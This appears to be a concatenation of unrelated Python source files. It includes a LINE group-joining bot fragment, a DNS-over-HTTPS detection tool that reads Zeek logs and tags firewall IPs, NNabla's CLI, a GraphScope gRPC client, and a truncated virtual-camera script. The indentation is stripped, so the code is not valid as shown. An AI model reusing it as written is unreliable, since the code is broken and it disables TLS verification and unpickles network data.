link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
except Exception as error:
print (error)
while True:
try:
ops = oepoll.singleTrace(count=50)
if ops is not None:
for op in ops:
oepoll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
thread1.start()
thread1.join()
except Exception as e:
pass
|
doh-hunter.py
|
import json
import socket
import time
import sys
import configparser
import base64
import ipaddress
import random
import string
import os
from http.server import HTTPServer, BaseHTTPRequestHandler
import logging
from threading import Thread
from io import BytesIO
from parsezeeklogs import ParseZeekLogs
import pycurl
config = configparser.ConfigParser()
try:
# Get variables from the configuration file
config.read('config.txt')
general = config['General']
run_mode_1 = config['Run Mode 1']
run_mode_2 = config['Run Mode 2']
run_mode_3 = config['Run Mode 3']
logging_cfg = config['Logging']
log_level_info = {'DEBUG': logging.DEBUG,
'INFO': logging.INFO,
'WARNING': logging.WARNING,
'ERROR': logging.ERROR,
'CRITICAL': logging.CRITICAL,
}
log_level_from_config = logging_cfg.get('LOG_LEVEL')
log_level = log_level_info.get(log_level_from_config, log_level_from_config)
logging.basicConfig(level=log_level, format='%(asctime)s [%(levelname)s] %(message)s')
RUN_MODE = int(general.get('RUN_MODE'))
CHECKS_TIMEOUT = int(general.get('CHECKS_TIMEOUT'))
TAG_LIFETIME = int(general.get('TAG_LIFETIME'))
CACHE_AGEOUT = int(general.get('CACHE_AGEOUT'))
REFERENCE_DOMAIN = general.get('REFERENCE_DOMAIN')
ZEEK_LOG_PATH = general.get('ZEEK_LOG_PATH')
MAX_THREADS = int(general.get('MAX_THREADS'))
MAX_KEYS = int(general.get('MAX_KEYS'))
FAIL_OPEN = general.getboolean('FAIL_OPEN')
IPV4_INCLUDE = general.get('IPV4_INCLUDE')
IPV4_EXCLUDE = general.get('IPV4_EXCLUDE')
IPV6_INCLUDE = general.get('IPV6_INCLUDE')
IPV6_EXCLUDE = general.get('IPV6_EXCLUDE')
MAX_API = int(run_mode_1.get('MAX_API'))
FW_TAG = run_mode_1.get('FW_TAG')
FW_IP = run_mode_1.get('FW_IP')
API_KEY = run_mode_1.get('API_KEY')
FW_TIMEOUT = int(run_mode_1.get('FW_TIMEOUT'))
CHECK_FW_CERT = run_mode_1.getboolean('CHECK_FW_CERT')
HTTP_PORT = int(run_mode_2.get('HTTP_PORT'))
FILE_PATH = run_mode_3.get('FILE_PATH')
except Exception as e:
logging.critical('Error reading config file "config.txt": %s', e)
sys.exit(1)
cacheDict = {}
dohlist = []
dohtext = ""
lastcleaned = 0
lastcleanededl = 0
discovered = 0
textrevision = 0
prevdiscovered = 0
taggingrate = 0
prevts = time.time()
uptime_1 = time.time()
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
self.wfile.write(dohtext.encode())
def run_server():
httpd = HTTPServer(('', HTTP_PORT), SimpleHTTPRequestHandler)
logging.warning('Starting server on port %d', HTTP_PORT)
httpd.serve_forever()
def filterip(IP):
try:
address = ipaddress.ip_address(IP)
except ValueError:
logging.error('%s is not a valid IPv4/IPv6 address, skipping', IP)
return 0
if type(address) is ipaddress.IPv4Address:
for incmember in v4inclfilter:
logging.debug('%s must be in %s', address, incmember)
if address in incmember:
logging.debug('%s matches filters', IP)
for excmember in v4exclfilter:
logging.debug('%s must NOT be in %s', address, excmember)
if address in excmember:
logging.debug('%s does not match filters, skipping', IP)
return 0
else:
logging.debug('%s matches filters', IP)
return 1
logging.debug('%s does not match filters, skipping', IP)
return 0
elif type(address) is ipaddress.IPv6Address:
for incmember in v6inclfilter:
logging.debug('%s must be in %s', address, incmember)
if address in incmember:
logging.debug('%s matches filters', IP)
for excmember in v6exclfilter:
logging.debug('%s must NOT be in %s', address, excmember)
if address in excmember:
logging.debug('%s does not match filters, skipping', IP)
return 0
else:
logging.debug('%s matches filters', IP)
return 1
logging.debug('%s does not match filters, skipping', IP)
return 0
else:
logging.error('%s is not a valid IPv4/IPv6 address, skipping', IP)
return 0
def curl_debug(debug_type, debug_msg):
logging.debug('debug(%d): %s', debug_type, debug_msg)
def check_ip(IP, sni, query, query64, transactionid):
logging.debug('%s Attempting wire format query for IP %s using SNI %s', transactionid, IP, sni)
buffer = BytesIO()
c = pycurl.Curl()
c.setopt(pycurl.RESOLVE, ["{}:443:{}".format(sni, IP)])
c.setopt(pycurl.URL, 'https://{}/dns-query?dns={}'.format(sni, query64))
c.setopt(pycurl.HTTPHEADER, ["accept: application/dns-message"])
c.setopt(pycurl.SSL_VERIFYPEER, 0)
c.setopt(pycurl.SSL_VERIFYHOST, 0)
c.setopt(pycurl.TIMEOUT, CHECKS_TIMEOUT)
c.setopt(pycurl.WRITEDATA, buffer)
if logging.DEBUG >= logging.root.level:
c.setopt(pycurl.VERBOSE, 1)
c.setopt(pycurl.DEBUGFUNCTION, curl_debug)
try:
c.perform()
except pycurl.error:
logging.info('%s cURL had issues or timed out while checking IP %s with SNI %s using '
'wire format', transactionid, IP, sni)
return 0
if c.getinfo(pycurl.HTTP_CODE) != 200:
logging.info('%s HTTP status unsuccessful for IP %s with SNI %s using wire format, '
'HTTP_CODE %d', transactionid, IP, sni, c.getinfo(pycurl.HTTP_CODE))
body = buffer.getvalue()
logging.info('%s Received response from IP %s using SNI %s and wire format', transactionid, IP,
sni)
logging.debug('%s Response body: %s', transactionid, body)
if len(body) < 1000 and len(body) > 10:
if body[-4] == oct1 and body[-3] == oct2 and body[-2] == oct3 and body[-1] == oct4:
logging.warning('%s Found a wire format DoH server at IP %s with SNI %s', transactionid,
IP, sni)
return 1
else:
logging.debug('%s No match for wire format response, last 4 bytes are %s %s %s %s, '
'expected %s %s %s %s', transactionid, body[-4], body[-3], body[-2],
body[-1], oct1, oct2, oct3, oct4)
else:
logging.debug('%s Attempting JSON query for IP %s using SNI %s', transactionid, IP, sni)
buffer = BytesIO()
c.setopt(pycurl.URL, 'https://{}/dns-query?name={}&type=A'.format(sni, query))
c.setopt(pycurl.HTTPHEADER, ["accept: application/dns-json"])
c.setopt(pycurl.WRITEDATA, buffer)
try:
c.perform()
except pycurl.error:
logging.info('%s cURL had issues or timed out while contacting IP %s with SNI %s '
'using JSON', transactionid, IP, sni)
return 0
logging.info('%s HTTP status unsuccessful for IP %s with SNI %s using JSON, HTTP_CODE %d',
transactionid, IP, sni, c.getinfo(pycurl.HTTP_CODE))
c.close()
body = buffer.getvalue()
logging.info('%s Received response from IP %s using SNI %s and JSON', transactionid, IP,
sni)
logging.debug('%s Response body: %s', transactionid, body)
if len(body) < 1000 and len(body) > 10 and exampleip in str(body):
logging.warning('%s Found a JSON DoH server at IP %s with SNI %s', transactionid, IP,
sni)
return 1
else:
logging.info('%s Tried both methods and did not detect for IP %s using SNI %s',
transactionid, IP, sni)
return 0
def check_cache(IP, sni):
try:
for lists in cacheDict[IP]:
if sni == lists[0]:
return 1
logging.debug('IP %s with SNI %s not found in cache', IP, sni)
return 0
except KeyError:
logging.debug('IP %s not found in cache for any SNI', IP)
return 0
def write_cache(IP, sni, transactionid):
if len(cacheDict) > MAX_KEYS:
logging.critical('%s Cache full, cannot cache IP %s', transactionid, IP)
return 0
try:
cacheDict[IP].append([sni, time.time()])
except KeyError:
logging.debug('%s Key %s not present, adding it', transactionid, IP)
cacheDict[IP] = [[sni, time.time()]]
def age_out_cache():
ts = time.time()
keystorm = []
subvaltorm = []
for IP, sni_list in cacheDict.items():
for sublist in sni_list:
logging.debug('Cache entry %s %s age is %s seconds', IP, sublist[0], ts - sublist[1])
if ts - sublist[1] > CACHE_AGEOUT:
subvaltorm.append([IP, sublist])
for sublist in subvaltorm:
logging.debug('removing %s from entry %s in cache', sublist[1], sublist[0])
cacheDict[sublist[0]].remove(sublist[1])
for IP, sni_list in cacheDict.items():
if not sni_list:
keystorm += [IP]
for IP in keystorm:
logging.debug('removing key %s from cache', IP)
del cacheDict[IP]
def tag_ip(IP, timeout, tag, fw_ip, api_key, transactionid):
global taggingrate
global MAX_API
if taggingrate > MAX_API:
logging.error('%s Tagging rate is over the configured limit ( %d vs %d ). Retrying tag '
'in 2 seconds', transactionid, taggingrate, MAX_API)
time.sleep(2 + random.random())
if taggingrate > MAX_API:
logging.critical('%s Not tagging IP %s on firewall, tagging rate is %d which is above '
'the configured max %d', transactionid, IP, taggingrate, MAX_API)
return 0
xml = ('<uid-message><type>update</type><payload><register><entry ip="{}" persistent="0"><tag>'
'<member timeout="{}">{}</member></tag></entry></register></payload>'
'</uid-message>'.format(IP, timeout, tag))
buffer = BytesIO()
c = pycurl.Curl()
try:
if type(ipaddress.ip_address(IP)) is ipaddress.IPv4Address:
c.setopt(pycurl.URL, 'https://{}/api/?type=user-id&key={}'.format(fw_ip, api_key))
else:
# IPv6
c.setopt(pycurl.URL, 'https://[{}]/api/?type=user-id&key={}'.format(fw_ip, api_key))
except ValueError:
# FQDN
c.setopt(pycurl.URL, 'https://{}/api/?type=user-id&key={}'.format(fw_ip, api_key))
c.setopt(pycurl.POSTFIELDS, "cmd={}".format(xml))
c.setopt(pycurl.SSL_VERIFYPEER, CHECK_FW_CERT)
c.setopt(pycurl.SSL_VERIFYHOST, CHECK_FW_CERT)
c.setopt(pycurl.TIMEOUT, FW_TIMEOUT)
c.setopt(pycurl.WRITEDATA, buffer)
if logging.DEBUG >= logging.root.level:
c.setopt(pycurl.VERBOSE, 1)
c.setopt(pycurl.DEBUGFUNCTION, curl_debug)
try:
c.perform()
except pycurl.error:
logging.error('%s cURL had issues or timed out while trying to contact the firewall'
' at %s to tag IP %s', transactionid, fw_ip, IP)
return 0
body = buffer.getvalue()
logging.info('%s Received response from firewall at %s tagging IP %s', transactionid, fw_ip, IP)
logging.debug('%s Response body: %s', transactionid, body)
if c.getinfo(pycurl.HTTP_CODE) == 200:
return 1
else:
logging.critical('%s Tagging IP %s on firewall %s failed with HTTP code %s', transactionid,
IP, fw_ip, c.getinfo(pycurl.RESPONSE_CODE))
return 0
def thread_func(ip, sni, reference_domain, ref_domain_base64, tag_lifetime, fw_tag, fw_ip, api_key):
global discovered
global dohlist
found = 0
transactionid = ''.join(random.choices(string.ascii_lowercase + string.digits, k=5))
if check_ip(ip, sni, reference_domain, ref_domain_base64, transactionid):
logging.warning('%s Found DoH server at %s with SNI %s', transactionid, ip, sni)
discovered += 1
if RUN_MODE == 1:
# Notify firewall
if tag_ip(ip, tag_lifetime, fw_tag, fw_ip, api_key, transactionid):
logging.warning('%s Successfully tagged IP %s on firewall %s with tag %s',
transactionid, ip, fw_ip, fw_tag)
else:
logging.critical('%s Failed to tag IP %s on firewall %s', transactionid, ip, fw_ip)
else:
for sublist in dohlist:
if ip == sublist[0]:
# Update timestamp
sublist[1] = time.time()
found = 1
break
if not found:
dohlist.append([ip, time.time()])
if RUN_MODE == 2:
logging.warning('%s Updating dynamic list with IP %s on next refresh',
transactionid, ip)
if RUN_MODE == 3:
logging.warning('%s Updating file list with IP %s on next refresh', transactionid,
ip)
if check_cache(ip, sni):
logging.debug('IP %s with SNI %s found in cache after rechecking', ip, sni)
else:
logging.debug('%s Adding IP %s with SNI %s to cache', transactionid, ip, sni)
write_cache(ip, sni, transactionid)
def text_refresh():
global textrevision
global dohtext
dohtext = ""
dohtext += "#REVISION {}\n".format(textrevision)
dohtext += "#TOTAL DoH FOUND: {}\n".format(len(dohlist))
dohtext += "#TOTAL IPs IN CACHE: {}\n".format(len(cacheDict))
dohtext += "#RUNNING TIME: {} SECONDS\n\n".format(time.time() - uptime_1)
for lists in dohlist:
dohtext += lists[0]
dohtext += "\n"
textrevision += 1
def age_out_list():
global dohlist
listtorm = []
for lists in dohlist:
if time.time() - lists[1] > TAG_LIFETIME and TAG_LIFETIME > 0:
listtorm += [lists]
for lists in listtorm:
dohlist.remove(lists)
def tag_rate_checker():
global taggingrate
global discovered
global prevdiscovered
global prevts
while True:
time.sleep(1)
taggingrate = (discovered - prevdiscovered) / (time.time() - prevts)
prevdiscovered = discovered
prevts = time.time()
logging.debug('Script is sending %s tags per second to the firewall', taggingrate)
logging.warning('Make sure you edit config.txt with your preferred settings.')
logging.warning('Run mode is %d', RUN_MODE)
time.sleep(5)
if TAG_LIFETIME > 2592000 or TAG_LIFETIME < 0:
logging.critical('The maximum value for TAG_LIFETIME is 2592000 and the minimum is '
'0 (unlimited). Please configure a compatible value and run the script again.')
sys.exit(1)
if RUN_MODE not in (1, 2, 3):
logging.critical('RUN_MODE must be either 1, 2 or 3.')
sys.exit(1)
if RUN_MODE == 1 and (API_KEY == "" or FW_IP == ""):
logging.critical('Please configure a valid firewall IP and API key.')
sys.exit(1)
if not os.path.isfile(ZEEK_LOG_PATH):
logging.critical('File %s not found', ZEEK_LOG_PATH)
sys.exit(1)
# Check filters
v4inclfilter = []
if IPV4_INCLUDE == "":
IPV4_INCLUDE = "0.0.0.0/0"
for member in IPV4_INCLUDE.split(','):
try:
addr = ipaddress.ip_network(member)
if type(addr) is ipaddress.IPv4Network and addr != "":
v4inclfilter += [ipaddress.ip_network(member)]
else:
logging.critical('Invalid IPv4 include filter provided, %s. Exiting', member)
sys.exit(1)
except SystemExit:
sys.exit(1)
except ValueError:
logging.critical('Invalid IPv4 include filter provided, %s. Exiting', member)
sys.exit(1)
v4exclfilter = []
if IPV4_EXCLUDE != "":
for member in IPV4_EXCLUDE.split(','):
try:
addr = ipaddress.ip_network(member)
if type(addr) is ipaddress.IPv4Network and addr != "":
v4exclfilter += [ipaddress.ip_network(member)]
else:
logging.critical('Invalid IPv4 exclude filter provided, %s. Exiting', member)
sys.exit(1)
except SystemExit:
sys.exit(1)
except ValueError:
logging.critical('Invalid IPv4 exclude filter provided, %s. Exiting', member)
sys.exit(1)
v6inclfilter = []
if IPV6_INCLUDE == "":
IPV6_INCLUDE = "::/0"
for member in IPV6_INCLUDE.split(','):
try:
addr = ipaddress.ip_network(member)
if type(addr) is ipaddress.IPv6Network and addr != "":
v6inclfilter += [ipaddress.ip_network(member)]
else:
logging.critical('Invalid IPv6 include filter provided, %s. Exiting', member)
sys.exit(1)
except SystemExit:
sys.exit(1)
except ValueError:
logging.critical('Invalid IPv6 include filter provided, %s. Exiting', member)
sys.exit(1)
v6exclfilter = []
if IPV6_EXCLUDE != "":
for member in IPV6_EXCLUDE.split(','):
try:
addr = ipaddress.ip_network(member)
if type(addr) is ipaddress.IPv6Network and addr != "":
v6exclfilter += [ipaddress.ip_network(member)]
else:
logging.critical('Invalid IPv6 exclude filter provided, %s. Exiting', member)
sys.exit(1)
except SystemExit:
sys.exit(1)
except ValueError:
logging.critical('Invalid IPv6 exclude filter provided, %s. Exiting', member)
sys.exit(1)
# Start HTTP server
if RUN_MODE == 2:
thread = Thread(target=run_server, args=())
thread.daemon = True
thread.start()
# Domain name to wire format
labels = b""
for part in REFERENCE_DOMAIN.split('.'):
label = part.encode('ascii')
length = len(label).to_bytes(1, 'big')
labels += (length + label)
reference_domain_hex = labels.hex()
hex_string = "abcd01000001000000000000{}0000010001".format(reference_domain_hex)
hex_bytes = bytes.fromhex(hex_string)
reference_domain_base64 = base64.urlsafe_b64encode(hex_bytes).decode("utf-8")
reference_domain_base64 = reference_domain_base64.replace("=", "")
if RUN_MODE == 1:
thread = Thread(target=tag_rate_checker, args=())
thread.start()
logging.warning('Entering scan loop')
while True:
logging.info('Commencing scan')
threadlist = []
toremove = []
for t in threadlist:
if not t.is_alive():
toremove += [t]
for t in toremove:
threadlist.remove(t)
logging.info('Current active threads is %d', len(threadlist))
# Resolve example.com for comparison
logging.warning('Attempting to resolve reference domain %s', REFERENCE_DOMAIN)
retries = 0
success = False
while not success:
try:
exampleip = [str(i[4][0]) for i in socket.getaddrinfo(REFERENCE_DOMAIN, 80)]
success = True
except Exception as e:
retries += 1
if retries > 10:
logging.critical('Failed to resolve reference domain %s, exiting...',
REFERENCE_DOMAIN)
sys.exit(1)
logging.error('Failed to resolve reference domain %s because of %s, retrying...',
REFERENCE_DOMAIN, e)
time.sleep(10)
exampleip = exampleip[0]
exampleip_split = exampleip.split(".", 3)
oct1 = int(exampleip_split[0])
oct2 = int(exampleip_split[1])
oct3 = int(exampleip_split[2])
oct4 = int(exampleip_split[3])
logging.warning('Domain %s resolves to %s', REFERENCE_DOMAIN, exampleip)
timerolled = time.time()
while not os.path.isfile(ZEEK_LOG_PATH):
if time.time() - timerolled > 4000:
logging.critical('Log file at %s not present for over 1 hour. Exiting script.',
ZEEK_LOG_PATH)
sys.exit(1)
logging.warning('Log file at %s currently does not exist, probably rolled by Zeek. Checking'
' again in 10 seconds...', ZEEK_LOG_PATH)
time.sleep(10)
# Parse ssl.log
logging.warning('Parsing file %s', ZEEK_LOG_PATH)
for log_record in ParseZeekLogs(ZEEK_LOG_PATH, output_format="json", safe_headers=False,
fields=["id.resp_h", "id.resp_p", "server_name", "resumed",
"established"]):
if log_record is not None:
log_record_json = json.loads(log_record)
logging.debug('Parsing log record %s', log_record_json)
if not filterip(log_record_json["id.resp_h"]):
continue
# Look for fully established HTTPS connections
logging.debug('Destination port is %s and established value is %s',
log_record_json["id.resp_p"], log_record_json["established"])
if log_record_json["id.resp_p"] == 443 and log_record_json["established"] is True:
logging.debug('Log record compatible, scanning it')
# Don't send SNI if not available, check IP and cache it
if log_record_json["server_name"] == "-" or log_record_json["server_name"] == "":
logging.info('Log record %s has no SNI information, using raw IP instead',
log_record_json["id.resp_h"])
if not check_cache(log_record_json["id.resp_h"], log_record_json["id.resp_h"]):
if len(cacheDict) > MAX_KEYS and FAIL_OPEN is True:
logging.error('FAIL_OPEN is set to True and cache is full, not scanning'
' IP %s with SNI %s', log_record_json["id.resp_h"],
log_record_json["id.resp_h"])
continue
logging.info('IP %s with SNI %s not in cache, checking it',
log_record_json["id.resp_h"], log_record_json["id.resp_h"])
thread = Thread(target=thread_func, args=(log_record_json["id.resp_h"],
log_record_json["id.resp_h"], REFERENCE_DOMAIN,
reference_domain_base64, TAG_LIFETIME, FW_TAG, FW_IP,
API_KEY))
thread.start()
threadlist.append(thread)
else:
logging.debug('IP %s with SNI %s is already in cache, scan aborted',
log_record_json["id.resp_h"], log_record_json["id.resp_h"])
else:
# Check IP and cache it
if not check_cache(log_record_json["id.resp_h"],
log_record_json["server_name"]):
if len(cacheDict) > MAX_KEYS and FAIL_OPEN is True:
logging.error('FAIL_OPEN is set to True and cache is full, not scanning'
' IP %s with SNI %s', log_record_json["id.resp_h"],
log_record_json["server_name"])
continue
logging.info('IP %s with SNI %s not in cache, checking it',
log_record_json["id.resp_h"], log_record_json["server_name"])
thread = Thread(target=thread_func, args=(log_record_json["id.resp_h"],
log_record_json["server_name"], REFERENCE_DOMAIN,
reference_domain_base64, TAG_LIFETIME, FW_TAG, FW_IP,
API_KEY))
thread.start()
threadlist.append(thread)
else:
logging.debug('IP %s with SNI %s is already in cache, scan aborted',
log_record_json["id.resp_h"], log_record_json["server_name"])
while len(threadlist) > MAX_THREADS:
logging.debug('MAX_THREADS value reached, waiting')
toremove = []
for t in threadlist:
if not t.is_alive():
toremove += [t]
for t in toremove:
threadlist.remove(t)
logging.info('Current active threads is %d', len(threadlist))
logging.warning('Waiting 60 seconds before cache clean')
time.sleep(60)
# Age out cache and list
logging.warning('Cleaning stale cache entries')
age_out_cache()
if RUN_MODE in (2, 3):
logging.warning('Cleaning stale list entries')
age_out_list()
# Refresh EDL text string
logging.warning('Refreshing external lists')
text_refresh()
# Write to file
if RUN_MODE == 3:
with open(FILE_PATH, "w") as text_file:
print(dohtext, file=text_file)
logging.warning('Current entries in cache: %s unique IPs, maximum limit is %s', len(cacheDict),
MAX_KEYS)
logging.warning('Total DoH servers discovered: %d', len(dohlist))
logging.warning('Waiting 60 seconds before next scan')
time.sleep(60)
|
cli.py
|
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
def _nnabla_version():
import nnabla
return 'Version {}'.format(nnabla.__version__) + \
', ' + \
'Build {}'.format(nnabla.__build_number__)
def version_command(args):
print(_nnabla_version())
return_value = None
def main():
global return_value
import six.moves._thread as thread
import threading
thread.stack_size(128 * 1024 * 1024)
sys.setrecursionlimit(0x3fffffff)
main_thread = threading.Thread(target=cli_main)
main_thread.start()
main_thread.join()
if not return_value:
sys.exit(-1)
def cli_main():
global return_value
return_value = False
import nnabla
parser = argparse.ArgumentParser(description='Command line interface ' +
'for NNabla({})'.format(_nnabla_version()))
parser.add_argument(
'-m', '--mpi', help='exec with mpi.', action='store_true')
subparsers = parser.add_subparsers()
from nnabla.utils.cli.train import add_train_command
add_train_command(subparsers)
from nnabla.utils.cli.forward import add_infer_command, add_forward_command
add_infer_command(subparsers)
add_forward_command(subparsers)
from nnabla.utils.cli.encode_decode_param import add_decode_param_command, add_encode_param_command
add_encode_param_command(subparsers)
add_decode_param_command(subparsers)
from nnabla.utils.cli.profile import add_profile_command
add_profile_command(subparsers)
from nnabla.utils.cli.conv_dataset import add_conv_dataset_command
add_conv_dataset_command(subparsers)
from nnabla.utils.cli.compare_with_cpu import add_compare_with_cpu_command
add_compare_with_cpu_command(subparsers)
from nnabla.utils.cli.create_image_classification_dataset import add_create_image_classification_dataset_command
add_create_image_classification_dataset_command(subparsers)
from nnabla.utils.cli.uploader import add_upload_command
add_upload_command(subparsers)
from nnabla.utils.cli.uploader import add_create_tar_command
add_create_tar_command(subparsers)
from nnabla.utils.cli.convert import add_convert_command
add_convert_command(subparsers)
# Version
subparser = subparsers.add_parser(
'version', help='Print version and build number.')
subparser.set_defaults(func=version_command)
print('NNabla command line interface (Version {}, Build {})'.format(
nnabla.__version__, nnabla.__build_number__))
args = parser.parse_args()
if 'func' not in args:
parser.print_help(sys.stderr)
return
if args.mpi:
from nnabla.utils.communicator_util import create_communicator
comm = create_communicator()
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
comm.abort()
else:
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
return_value = False
if __name__ == '__main__':
main()
|
rpc.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import json
import logging
import pickle
import sys
import threading
import time
import grpc
from graphscope.framework.errors import ConnectionError
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import GRPCError
from graphscope.proto import coordinator_service_pb2_grpc
from graphscope.proto import error_codes_pb2
from graphscope.proto import message_pb2
from graphscope.version import __version__
logger = logging.getLogger("graphscope")
def catch_grpc_error(fn):
"""Print error info from a :class:`grpc.RpcError`."""
@functools.wraps(fn)
def with_grpc_catch(*args, **kwargs):
try:
return fn(*args, **kwargs)
except grpc.RpcError as exc:
if grpc.StatusCode.INTERNAL == exc.code():
raise GRPCError("Internal Error: " + exc.details()) from None
elif (
grpc.StatusCode.UNKNOWN == exc.code()
or grpc.StatusCode.UNAVAILABLE == exc.code()
):
logger.error(
"rpc %s: failed with error code %s, details: %s"
% (fn.__name__, exc.code(), exc.details())
)
raise FatalError("The analytical engine server may down.") from None
else:
raise GRPCError(
"rpc %s failed: status %s" % (str(fn.__name__), exc)
) from None
return with_grpc_catch
def suppress_grpc_error(fn):
"""Suppress the GRPC error."""
@functools.wraps(fn)
def with_grpc_catch(*args, **kwargs):
try:
return fn(*args, **kwargs)
except grpc.RpcError as exc:
if isinstance(exc, grpc.Call):
logger.warning(
"Grpc call '%s' failed: %s: %s",
fn.__name__,
exc.code(),
exc.details(),
)
except Exception as exc: # noqa: F841
logger.warning("RPC call failed: %s", exc)
return with_grpc_catch
class GRPCClient(object):
def __init__(self, launcher, reconnect=False):
"""Connect to GRAPE engine at the given :code:`endpoint`."""
# create the gRPC stub
options = [
("grpc.max_send_message_length", 2147483647),
("grpc.max_receive_message_length", 2147483647),
("grpc.max_metadata_size", 2147483647),
]
self._launcher = launcher
self._channel = grpc.insecure_channel(
launcher.coordinator_endpoint, options=options
)
self._stub = coordinator_service_pb2_grpc.CoordinatorServiceStub(self._channel)
self._session_id = None
self._logs_fetching_thread = None
self._reconnect = reconnect
def waiting_service_ready(self, timeout_seconds=60):
begin_time = time.time()
request = message_pb2.HeartBeatRequest()
while True:
code = self._launcher.poll()
if code is not None and code != 0:
raise RuntimeError(f"Start coordinator failed with exit code {code}")
try:
self._stub.HeartBeat(request)
logger.info("GraphScope coordinator service connected.")
break
except grpc.RpcError as e:
# Cannot connect to coordinator for a short time is expected
# as the coordinator takes some time to launch
msg = f"code: {e.code().name}, details: {e.details()}"
if e.code() == grpc.StatusCode.DEADLINE_EXCEEDED:
logger.warning("Heart beat analytical engine failed, %s", msg)
else:
logger.warning("Heart beat coordinator failed, %s", msg)
if time.time() - begin_time >= timeout_seconds:
raise ConnectionError(
"Connect coordinator timeout, coordinator code: %s, details: %s",
e.code().name,
e.details(),
)
time.sleep(1)
def connect(self, cleanup_instance=True, dangling_timeout_seconds=60):
return self._connect_session_impl(
cleanup_instance=cleanup_instance,
dangling_timeout_seconds=dangling_timeout_seconds,
)
@property
def session_id(self):
return self._session_id
def __str__(self):
return "%s" % self._session_id
def __repr__(self):
return str(self)
def run(self, dag_def):
return self._run_step_impl(dag_def)
def fetch_logs(self):
if self._logs_fetching_thread is None:
self._logs_fetching_thread = threading.Thread(
target=self._fetch_logs_impl, args=()
)
self._logs_fetching_thread.daemon = True
self._logs_fetching_thread.start()
def close(self):
if self._session_id:
self._close_session_impl()
self._session_id = None
if self._logs_fetching_thread:
self._logs_fetching_thread.join(timeout=5)
@catch_grpc_error
def send_heartbeat(self):
request = message_pb2.HeartBeatRequest()
return self._stub.HeartBeat(request)
# @catch_grpc_error
def _connect_session_impl(self, cleanup_instance=True, dangling_timeout_seconds=60):
"""
Args:
cleanup_instance (bool, optional): If True, also delete graphscope
instance (such as pod) in closing process.
dangling_timeout_seconds (int, optional): After seconds of client
disconnect, coordinator will kill this graphscope instance.
Disable dangling check by setting -1.
"""
request = message_pb2.ConnectSessionRequest(
cleanup_instance=cleanup_instance,
dangling_timeout_seconds=dangling_timeout_seconds,
version=__version__,
reconnect=self._reconnect,
)
response = self._stub.ConnectSession(request)
self._session_id = response.session_id
return (
response.session_id,
response.cluster_type,
json.loads(response.engine_config),
response.pod_name_list,
response.num_workers,
response.namespace,
)
@suppress_grpc_error
def _fetch_logs_impl(self):
request = message_pb2.FetchLogsRequest(session_id=self._session_id)
responses = self._stub.FetchLogs(request)
for resp in responses:
info = resp.info_message.rstrip()
if info:
logger.info(info, extra={"simple": True})
error = resp.error_message.rstrip()
if error:
logger.error(error, extra={"simple": True})
@catch_grpc_error
def _close_session_impl(self):
request = message_pb2.CloseSessionRequest(session_id=self._session_id)
response = self._stub.CloseSession(request)
return response
@catch_grpc_error
def _run_step_impl(self, dag_def):
request = message_pb2.RunStepRequest(
session_id=self._session_id, dag_def=dag_def
)
response = self._stub.RunStep(request)
if response.code != error_codes_pb2.OK:
logger.error(
"Runstep failed with code: %s, message: %s",
error_codes_pb2.Code.Name(response.code),
response.error_msg,
)
if response.full_exception:
raise pickle.loads(response.full_exception)
return response
|
vcam.py
|
import cv2
import pyvirtualcam # For making virtual camera
from pyvirtualcam import PixelFormat
import numpy as np
import mediapipe as mp # Face Mesh
import multiprocessing # Enables python to run 2 processes at same time
import time
import speech_recognition as sr # Speech Recognizer
import cvzone as cv
## This function is used to take real time microphone input from user
def takesinput():
r = sr.Recognizer()
mic = sr.Microphone(device_index=1)
#print(sr.Microphone.list_microphone_names())
text=""
with mic as source:
while True:
r.adjust_for_ambient_noise(source) # To avoid taking background noise
audio = r.listen(source)
try:
text=r.recognize_google(audio)
except:
pass
#result.value=text
print(text)
fh = open("Utils/words.txt","w+") # Saving Text in words text file (to be retrieved later)
fh.write(text)
print(fh.read(),"from takesinput")
fh.close()
def program():
print(1)
mp_drawing = mp.solutions.drawing_utils # For face mesh
mp_face_mesh = mp.solutions.face_mesh
face_cascade = cv2.CascadeClassifier(r'C:\Users\tusha\AppData\Local\Programs\Python\Python38\Lib\site-packages\cv2\data\haarcascade_frontalface_default.xml')
camera_no=0
'''
try:
camera_no = int(input("Enter Camera Number : "))
except:
pass
# Set up webcam capture.
'''
vcam = cv2.VideoCapture(camera_no) # Change camera no if camera doesn't detect
if not vcam.isOpened():
raise RuntimeError('Could not open video source')
#Settings for virtual camera
pref_width = 1280
pref_height = 720
pref_fps_in = 30
vcam.set(cv2.CAP_PROP_FRAME_WIDTH, pref_width)
vcam.set(cv2.CAP_PROP_FRAME_HEIGHT, pref_height)
vcam.set(cv2.CAP_PROP_FPS, pref_fps_in)
width = int(vcam.get(cv2.CAP_PROP_FRAME_WIDTH))
